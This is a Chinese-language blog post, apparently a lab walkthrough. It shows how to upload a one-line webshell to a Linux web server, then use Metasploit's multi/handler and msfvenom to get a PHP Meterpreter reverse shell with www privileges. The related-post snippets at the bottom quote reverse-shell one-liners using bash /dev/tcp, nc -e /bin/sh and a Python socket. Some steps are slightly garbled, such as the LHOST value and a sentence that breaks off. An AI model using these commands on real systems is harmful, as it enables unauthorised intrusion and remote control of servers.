msf反弹php shell,msf实现linux shell反弹

最新推荐文章于 2024-07-09 11:38:25 发布
最新推荐文章于 2024-07-09 11:38:25 发布
阅读量728 收藏 2
点赞数
文章标签: msf反弹php shell
本文介绍了在kali Linux环境下,针对192.168.123.5服务器上的80端口进行渗透测试的过程。通过使用Meterpreter payload,设置回连到kali的IP地址,生成并上传一句话木马,成功反弹了shell。在获得www权限后,文章预告了后续的提权技巧,但具体的提权方法将在下期分享。
摘要由CSDN通过智能技术生成

66b39cefea89699334f2cf28c29bb452.gif

运行环境:

kali       ip:192.168.123.90

Linux    ip:192.168.123.5

Linux服务器上开有80端口,并且有上传

话不多说,上传一句话,菜刀连接。

66b39cefea89699334f2cf28c29bb452.gif

然后打开kali 并启动msf

进入 >   use exploit/multi/handler

设置 payload>   set payload php/metrpreter/reverse_tcp

66b39cefea89699334f2cf28c29bb452.gif

设置IP  > set lhost 192.168.123.90

66b39cefea89699334f2cf28c29bb452.gif

查看一下参数>show options

66b39cefea89699334f2cf28c29bb452.gif

没啥问题开始监听>run

66b39cefea89699334f2cf28c29bb452.gif

再在终端上生产msf

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php

然后将产生的

66b39cefea89699334f2cf28c29bb452.gif

我们再看msf发现已经有会话反弹过来了,我们接下来看一下

66b39cefea89699334f2cf28c29bb452.gif

然后我们查看并进入会话查看信息

66b39cefea89699334f2cf28c29bb452.gif

进入shell

66b39cefea89699334f2cf28c29bb452.gif

上面已经进入shell 并且执行的ls命令,下面让我们看下权限

66b39cefea89699334f2cf28c29bb452.gif

是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。

本人也是小菜,望大佬勿喷。

有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。

袋熊宝宝
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 755
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
msf反弹shell
weixin_34179762的博客
05-15 980
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
msf反弹php shell,msf反弹shell - osc_u4ki5b6h的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_34230075的博客
03-22 394
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗反弹shell的两种方法 第一种Msfvenom实例:1、msfconsole    #启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php    #生成反弹shell文件LHOST表示本地攻击机的ip,LPO...
【内网渗透】MSF渗透阶段的常用指令笔记
最新发布
uuzeray的博客
07-09 1334
不需要访问目标主机磁盘,所以也没什么入侵的痕迹。download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\"ProgramFiles"\Tencent\QQ\Users\295。run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
msf--Linux反弹shell--一看就会的实验
lxlxxxlx的博客
09-22 2983
msf--Linux反弹shell--一看就会的实验
php结合msf反弹内网shell
aiquan9342的博客
07-17 642
感谢: perl6大佬分享的姿势。 MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > gen...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell.pdf
12-02
本课程聚焦于利用Cobalt Strike工具通过其接口传递Metasploit(MSF)中的shell。Cobalt Strike是一款高级的红队工具,广泛用于模拟攻击者的行为,而Metasploit则是一个开源的渗透测试框架,提供了大量的exploit和...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
MSF技术总结
05-07
* exploit/linuxLinux 漏洞利用模块 * exploit/multi:多平台漏洞利用模块 六、Payload 生成 MSF 提供了丰富的 Payload 生成命令,帮助用户快速生成 Payload。常用的命令包括: * generate:生成 Payload * -b...
msf生成php反弹,反弹shell总结
weixin_29967445的博客
04-13 1428
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
msf反弹php shell,反弹shell总结
weixin_42502419的博客
03-22 474
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2609
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
msf监听php反弹shell,使用msf进行反弹shell+内网渗透
weixin_39777242的博客
03-16 1700
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。1、反弹shell:1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令以下:“msfvenom -...
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7115
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6923
生成木马进行植入
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5268
msf
Linux计划任务执行msf木马,Metasploit生成木马文件获取shell和UAC提权操作
weixin_42297349的博客
05-16 931
前言攻击环境获取shellUAC提权一. 前言前段时间有做过一次内核提权的尝试,不过没有成功,主要还是权限控制的比较严格,并且该打的补丁都打了。但是方法还是有用的,还有就是思路流程总结一下。二. 攻击环境攻击机:kali Linux 2019.1 IP:192.168.28.156靶机:Windows7 ultimate sp1 IP:192.168.28.138三. 获取shell3.1 生成木...
msf反弹shell linux
07-28
MSF(Metasploit Framework)是一个功能强大的渗透测试工具,它提供了生成一句话反弹shell的工具msfvenom。使用msfvenom可以生成各种类型的命令行一句话反弹shell。具体使用方法如下: 1. 首先,打开终端并输入以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值